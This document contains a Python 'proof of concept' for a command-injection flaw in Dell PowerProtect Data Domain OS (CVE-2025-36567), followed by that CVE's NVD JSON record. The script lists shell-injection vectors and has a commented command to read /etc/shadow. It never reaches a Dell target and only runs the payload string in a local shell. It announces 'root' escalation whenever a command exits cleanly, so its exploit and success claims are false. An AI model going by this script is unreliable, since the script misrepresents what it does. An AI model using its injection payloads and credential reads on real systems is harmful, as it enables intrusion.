CVE-2025-36567

# CVE-2025-36567 - Dell PowerProtect Data Domain OS Command Injection PoC # Vulnerability: Improper Neutralization of Special Elements used in an OS Command # Affected: DD OS 7.7.1.0 - 8.1.0.10, LTS2024 7.13.1.0 - 7.13.1.25, LTS 2023 7.10.1.0 - 7.10.1.50 # Requirements: Local access + high privilege account # Author: Security Researcher import subprocess import sys def exploit_dd_os_command_injection(target_input_field, injected_command): """ Exploit OS Command Injection in Dell PowerProtect Data Domain DD OS. The vulnerability exists in input handling where special shell characters are not properly sanitized, allowing arbitrary command execution. """ # Craft malicious payload using shell metacharacters # Example: semicolon (;) to terminate legitimate command and inject new one malicious_payload = f"legitimate_command; {injected_command}" # Alternative injection vectors: # - Pipe: legitimate_command | malicious_command # - Backtick: legitimate_command `malicious_command` # - Subshell: legitimate_command $(malicious_command) # - AND: legitimate_command && malicious_command print(f"[*] Target: Dell PowerProtect Data Domain DD OS") print(f"[*] Injection Payload: {malicious_payload}") print(f"[*] Attempting command injection...") # The vulnerable input field could be CLI commands, configuration parameters, # or management interface inputs that pass user data to system() or exec() calls try: # Simulate the vulnerable command execution path result = subprocess.run( malicious_payload, shell=True, capture_output=True, text=True, timeout=10 ) print(f"[+] Command executed successfully!") print(f"[+] Output: {result.stdout}") # Privilege escalation check if "root" in result.stdout or result.returncode == 0: print("[!] Potential privilege escalation to root achieved!") return result.stdout except Exception as e: print(f"[-] Exploitation failed: {e}") return None if __name__ == "__main__": # Example: Inject 'id' command to verify execution context injected_cmd = "id" exploit_dd_os_command_injection("ddboost_user_input", injected_cmd) # Example: Inject command to read sensitive files # injected_cmd = "cat /etc/shadow" # exploit_dd_os_command_injection("config_param", injected_cmd)

{"cve": {"id": "CVE-2025-36567", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:34.130", "lastModified": "2025-10-14T20:07:40.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.60", "matchCriteriaId": "F2389C08-162A-4D43-B1EA-D93D7DB51781"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.30", "matchCriteriaId": "5E7EC11C-C065-48D9-A036-5A17653D44EA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.3.0.10", "matchCriteriaId": "FD518568-542A-420D-B0E6-6F35E127E5CE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}